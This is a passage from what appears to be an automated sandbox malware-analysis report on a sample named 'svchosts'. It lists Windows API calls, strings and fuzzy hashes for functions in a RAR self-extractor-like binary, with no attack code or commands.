                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;%u$x%u$xc%u
                                                                      • API String ID: 0-2277559157
                                                                      • Opcode ID: 05cc1466c54157d7aecedb9f50697f8cc4af8f91cc49af18afa05f445cc776d5
                                                                      • Instruction ID: ec91a32a93f2534ccc007342b21f60517e96e83a8130bcc96d14496f9c64f5b8
                                                                      • Opcode Fuzzy Hash: 05cc1466c54157d7aecedb9f50697f8cc4af8f91cc49af18afa05f445cc776d5
                                                                      • Instruction Fuzzy Hash: 17F13671624241ABDF15EF748895BEE7799AFD0300F080579FC85DB283DA64D86CCBA2
                                                                      APIs
                                                                        • Part of subcall function 0029130B: GetDlgItem.USER32(00000000,00003021), ref: 0029134F
                                                                        • Part of subcall function 0029130B: SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365
                                                                      • EndDialog.USER32(?,00000001), ref: 002AAD20
                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 002AAD47
                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 002AAD60
                                                                      • SetWindowTextW.USER32(?,?), ref: 002AAD71
                                                                      • GetDlgItem.USER32(?,00000065), ref: 002AAD7A
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 002AAD8E
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 002AADA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                                                      • String ID: LICENSEDLG
                                                                      • API String ID: 3214253823-2177901306
                                                                      • Opcode ID: 23b7c5f33df3a672b09f62e949a0092caeb25a88926c0fd4eff9ae2e33018abd
                                                                      • Instruction ID: 74c13338052d002ba77d6c7dcfa64fc4b1b3c8f7a0c4e7570a8cadc19b479466
                                                                      • Opcode Fuzzy Hash: 23b7c5f33df3a672b09f62e949a0092caeb25a88926c0fd4eff9ae2e33018abd
                                                                      • Instruction Fuzzy Hash: E721D632660205BBD6215F25FC4DF3B3B6CEF5BB96F010019F244A64A0DF525924DA32
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00299448
                                                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0029946B
                                                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0029948A
                                                                        • Part of subcall function 002A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0029BB05,00000000,.exe,?,?,00000800,?,?,002A85DF,?), ref: 002A17C2
                                                                      • _swprintf.LIBCMT ref: 00299526
                                                                        • Part of subcall function 0029400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0029401D
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00299595
                                                                      • MoveFileW.KERNEL32(?,?), ref: 002995D5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                      • String ID: rtmp%d
                                                                      • API String ID: 2111052971-3303766350
                                                                      • Opcode ID: 493e353385be4683f83f266a08f8f9baa3cbbf7f3d1e83c232697fb4ebcbdf90
                                                                      • Instruction ID: 6afe7f41dbc19d29db9a0e72645f37ec52e2102301aab5db748e79feb3d33e1d
                                                                      • Opcode Fuzzy Hash: 493e353385be4683f83f266a08f8f9baa3cbbf7f3d1e83c232697fb4ebcbdf90
                                                                      • Instruction Fuzzy Hash: F8415F7292025966CF20EF699C85EEA737CAF15390F0044E9B549E3042EB749BE9CF60
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,002D0EE8,002B3E14,002D0EE8,?,?,002B3713,00000050,?,002D0EE8,00000200), ref: 002B8FA9
                                                                      • _free.LIBCMT ref: 002B8FDC
                                                                      • _free.LIBCMT ref: 002B9004
                                                                      • SetLastError.KERNEL32(00000000,?,002D0EE8,00000200), ref: 002B9011
                                                                      • SetLastError.KERNEL32(00000000,?,002D0EE8,00000200), ref: 002B901D
                                                                      • _abort.LIBCMT ref: 002B9023
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$_abort
                                                                      • String ID: X,
                                                                      • API String ID: 3160817290-3991676738
                                                                      • Opcode ID: 4a4f94b502e18cb0510a7bf37353a456585f094dc62939474d5fcbe0b4bdc9eb
                                                                      • Instruction ID: 786f4093e588c993b87ad99f472f19fecddd6ff260a487d026a5be3df4b3a15e
                                                                      • Opcode Fuzzy Hash: 4a4f94b502e18cb0510a7bf37353a456585f094dc62939474d5fcbe0b4bdc9eb
                                                                      • Instruction Fuzzy Hash: 9AF02832534612AACA2177247C0EFFB2A2E9BC17E0B350414F61CD2592EF30CDB1DA50
                                                                      APIs
                                                                      • __aulldiv.LIBCMT ref: 002A0A9D
                                                                        • Part of subcall function 0029ACF5: GetVersionExW.KERNEL32(?), ref: 0029AD1A
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 002A0AC0
                                                                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 002A0AD2
                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 002A0AE3
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 002A0AF3
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 002A0B03
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 002A0B3D
                                                                      • __aullrem.LIBCMT ref: 002A0BCB
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                      • String ID:
                                                                      • API String ID: 1247370737-0
                                                                      • Opcode ID: c0194a7af29a49a7355c68d7ae4a6498b129045ac80bab3630d448ff16b7d400
                                                                      • Instruction ID: cfaab94ca40bd6a54b3e1adbcd2739cc19749f6b690dd4138cf3c007df895b8d
                                                                      • Opcode Fuzzy Hash: c0194a7af29a49a7355c68d7ae4a6498b129045ac80bab3630d448ff16b7d400
                                                                      • Instruction Fuzzy Hash: CB4149B24083069FC710DF65C88496BF7F8FB88718F004E2EF59692650EB75E559CB62
                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,002BF5A2,?,00000000,?,00000000,00000000), ref: 002BEE6F
                                                                      • __fassign.LIBCMT ref: 002BEEEA
                                                                      • __fassign.LIBCMT ref: 002BEF05
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 002BEF2B
                                                                      • WriteFile.KERNEL32(?,?,00000000,002BF5A2,00000000,?,?,?,?,?,?,?,?,?,002BF5A2,?), ref: 002BEF4A
                                                                      • WriteFile.KERNEL32(?,?,00000001,002BF5A2,00000000,?,?,?,?,?,?,?,?,?,002BF5A2,?), ref: 002BEF83
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: 881ad80b839778c48fc4b6975747532a4fb25ccbe6b43f0325975e739f57b4ec
                                                                      • Instruction ID: 05309500579073c00900ea8fab58796fba90c7a8bfa0c5c455dd484dde236eea
                                                                      • Opcode Fuzzy Hash: 881ad80b839778c48fc4b6975747532a4fb25ccbe6b43f0325975e739f57b4ec
                                                                      • Instruction Fuzzy Hash: 1E51D371A102099FDF10CFA8DC85AFEBBF9EF08350F25451AE955E7291E770A950CB60
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000800,?), ref: 002AC54A
                                                                      • _swprintf.LIBCMT ref: 002AC57E
                                                                        • Part of subcall function 0029400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0029401D
                                                                      • SetDlgItemTextW.USER32(?,00000066,002D946A), ref: 002AC59E
                                                                      • _wcschr.LIBVCRUNTIME ref: 002AC5D1
                                                                      • EndDialog.USER32(?,00000001), ref: 002AC6B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                      • String ID: %s%s%u
                                                                      • API String ID: 2892007947-1360425832
                                                                      • Opcode ID: 1e5527a70771183ce4b08cf621b61d9fbd4ca6f823a77cbe40462eb31d68da5e
                                                                      • Instruction ID: e81cab9dbbe03b1f9584d9edf78df7e6c83020e0adf95795500ace9c4ca730c3
                                                                      • Opcode Fuzzy Hash: 1e5527a70771183ce4b08cf621b61d9fbd4ca6f823a77cbe40462eb31d68da5e
                                                                      • Instruction Fuzzy Hash: 3E41DF71D20618ABDF22DFA0DC48EEA77BCEB09705F1040A6F509E6061EB719AE4CF50
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 002A8F38
                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 002A8F59
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: AllocByteCharGlobalMultiWide
                                                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                      • API String ID: 3286310052-4209811716
                                                                      • Opcode ID: 3aabdd2a4d103ef8a873e48495b9fe178c72c84f5024b8a5f49752a7bb4026e1
                                                                      • Instruction ID: 2a5f0177d7acc2d205f677d7afddb30235e85376b7fd8799c27fad8241683d45
                                                                      • Opcode Fuzzy Hash: 3aabdd2a4d103ef8a873e48495b9fe178c72c84f5024b8a5f49752a7bb4026e1
                                                                      • Instruction Fuzzy Hash: 59312831528312AFD724BF349C06FABBB68DF937A0F54051DF801A61D1EF749A2987A1
                                                                      APIs
                                                                      • ShowWindow.USER32(?,00000000), ref: 002A964E
                                                                      • GetWindowRect.USER32(?,00000000), ref: 002A9693
                                                                      • ShowWindow.USER32(?,00000005,00000000), ref: 002A972A
                                                                      • SetWindowTextW.USER32(?,00000000), ref: 002A9732
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 002A9748
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$RectText
                                                                      • String ID: RarHtmlClassName
                                                                      • API String ID: 3937224194-1658105358
                                                                      • Opcode ID: f161fab20b7e40d03d230371b75dcedd3fb2c83fa00f3e0736896a00c926882b
                                                                      • Instruction ID: 2c4ea2e03b78c1bf5e0cd970826a8f130d877fb88157665efb3e1e192e000ea4
                                                                      • Opcode Fuzzy Hash: f161fab20b7e40d03d230371b75dcedd3fb2c83fa00f3e0736896a00c926882b
                                                                      • Instruction Fuzzy Hash: 7431CE71014210EFCB219F65ED4CB6BBBACEF4A751F004569FA49AA152CB30D8A8CF65
                                                                      APIs
                                                                        • Part of subcall function 002BBF79: _free.LIBCMT ref: 002BBFA2
                                                                      • _free.LIBCMT ref: 002BC003
                                                                        • Part of subcall function 002B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?), ref: 002B84F4
                                                                        • Part of subcall function 002B84DE: GetLastError.KERNEL32(?,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?,?), ref: 002B8506
                                                                      • _free.LIBCMT ref: 002BC00E
                                                                      • _free.LIBCMT ref: 002BC019
                                                                      • _free.LIBCMT ref: 002BC06D
                                                                      • _free.LIBCMT ref: 002BC078
                                                                      • _free.LIBCMT ref: 002BC083
                                                                      • _free.LIBCMT ref: 002BC08E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                                                      • Instruction ID: 345456ba6a70d627814c9bcb2e8070f6af182bb43d0e65c88b907f5c5c536371
                                                                      • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                                                      • Instruction Fuzzy Hash: B9112C71560B08FAD621BBB1CD06FDBB7ADAF00780F408815B29D66C52DBA5F9248F90
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,002B20C1,002AFB12), ref: 002B20D8
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002B20E6
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002B20FF
                                                                      • SetLastError.KERNEL32(00000000,?,002B20C1,002AFB12), ref: 002B2151
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: 01e893124081c34650ae2458a5fa59410fe238ccb671ed52f67424c83b8fe504
                                                                      • Instruction ID: 058a18e5e2293602e88808ec2c9d1ae9f00524a4615ed33949d70717a86702b6
                                                                      • Opcode Fuzzy Hash: 01e893124081c34650ae2458a5fa59410fe238ccb671ed52f67424c83b8fe504
                                                                      • Instruction Fuzzy Hash: 0F01F032139312AEBB746F797C499D7278CEF117F07310629F228550E2EF514C259B44
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,002B895F,002B85FB,?,002B8FD3,00000001,00000364,?,002B3713,00000050,?,002D0EE8,00000200), ref: 002B902E
                                                                      • _free.LIBCMT ref: 002B9063
                                                                      • _free.LIBCMT ref: 002B908A
                                                                      • SetLastError.KERNEL32(00000000,?,002D0EE8,00000200), ref: 002B9097
                                                                      • SetLastError.KERNEL32(00000000,?,002D0EE8,00000200), ref: 002B90A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID: X,
                                                                      • API String ID: 3170660625-3991676738
                                                                      • Opcode ID: 576356d9e581a91974be02d5cf74a6a67fee65b8107b8ac708c5de1917860267
                                                                      • Instruction ID: 293453ec3fe8358d5ca4763f631d442d0e7973a681435a722e84273ebfb1f1da
                                                                      • Opcode Fuzzy Hash: 576356d9e581a91974be02d5cf74a6a67fee65b8107b8ac708c5de1917860267
                                                                      • Instruction Fuzzy Hash: 17014472534A026B87327B787C89DEB2A2D9BD17F13310824FB1992252EF70CCB18560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                      • API String ID: 0-1718035505
                                                                      • Opcode ID: 744487a8833b243bcac65d1f823048251285e92ba5c3c7df49422f06a798ef56
                                                                      • Instruction ID: 33a3ec64acef3c51084aa1b9f7722351ffaedd58adfcdb73135f6322e78963a9
                                                                      • Opcode Fuzzy Hash: 744487a8833b243bcac65d1f823048251285e92ba5c3c7df49422f06a798ef56
                                                                      • Instruction Fuzzy Hash: 4A01A9726726235B4F305E746CC9AA61395AE47373360463FE513D3610DE91C8A5D6A0
                                                                      APIs
                                                                      • _free.LIBCMT ref: 002B807E
                                                                        • Part of subcall function 002B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?), ref: 002B84F4
                                                                        • Part of subcall function 002B84DE: GetLastError.KERNEL32(?,?,002BBFA7,?,00000000,?,00000000,?,002BBFCE,?,00000007,?,?,002BC3CB,?,?), ref: 002B8506
                                                                      • _free.LIBCMT ref: 002B8090
                                                                      • _free.LIBCMT ref: 002B80A3
                                                                      • _free.LIBCMT ref: 002B80B4
                                                                      • _free.LIBCMT ref: 002B80C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_290000_svchosts.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID: ,
                                                                      • API String ID: 776569668-609127500
                                                                      • Opcode ID: 8649e7ae8c72376be1dadb532c71f9b4c873b63946d7539bfafc0875a94f0011
                                                                      • Instruction ID: 514386ed8f702aeaa1b40a535eab829afb3b27ef76eb9cebfd08767b6b760e08
                                                                      • Opcode Fuzzy Hash: 8649e7ae8c72376be1dadb532c71f9b4c873b63946d7539bfafc0875a94f0011
                                                                      • Instruction Fuzzy Hash: 7DF03A74821125CB8B116F1ABD098A53B6DBB147F0349462AF80AD7A70DB310872DFC1
                                                                      APIs
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 002A0D0D
                                                                        • Part of subcall function 0029ACF5: GetVersionExW.KERNEL32(?), ref: 0029AD1A
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,002A0CB8), ref: 002A0D31
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 002A0D47
                                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 002A0D56
                                                                      • SystemTimeToFileTime.KERNEL32(?,002A0CB8), ref: 002A0D64
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 002A0D72
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true
                                                                      • Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
